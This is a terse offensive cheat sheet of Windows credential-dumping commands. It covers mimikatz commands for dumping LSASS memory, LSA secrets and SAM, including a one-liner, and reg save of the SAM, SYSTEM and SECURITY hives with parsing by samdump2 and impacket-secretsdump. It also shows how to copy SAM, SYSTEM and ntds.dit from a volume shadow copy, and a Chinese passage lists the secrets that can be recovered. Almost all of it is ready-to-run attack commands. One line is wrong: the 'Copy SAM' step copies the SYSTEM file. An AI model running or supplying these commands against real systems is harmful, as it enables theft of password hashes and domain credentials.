#Elevate Privileges to extract the credentialsprivilege::debug#This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Adminstoken::elevate#Extract from lsass (memory)sekurlsa::logonpasswords#Extract from lsass (service)lsadump::lsa/inject#Extract from SAMlsadump::sam#One linermimikatz"privilege::debug""token::elevate""sekurlsa::logonpasswords""lsadump::lsa /inject""lsadump::sam""lsadump::cache""sekurlsa::ekeys""exit"
SYSTEM hive是可选的,但允许解密秘密(NT和LM哈希,附加凭据,如明文密码,kerberos或信任密钥,NT和LM密码历史记录)。除其他信息外,还提取以下数据:用户和计算机帐户及其哈希值,UAC标志,上次登录和更改密码的时间戳,帐户描述,名称,UPN,SPN,组和递归成员,组织单位树和成员资格,受信任的域及其信任类型,方向和属性...
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL
vssadmin create shadow /for=C:
#Copy SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SAM
#Copy SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
#Copy ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit
# You can also create a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\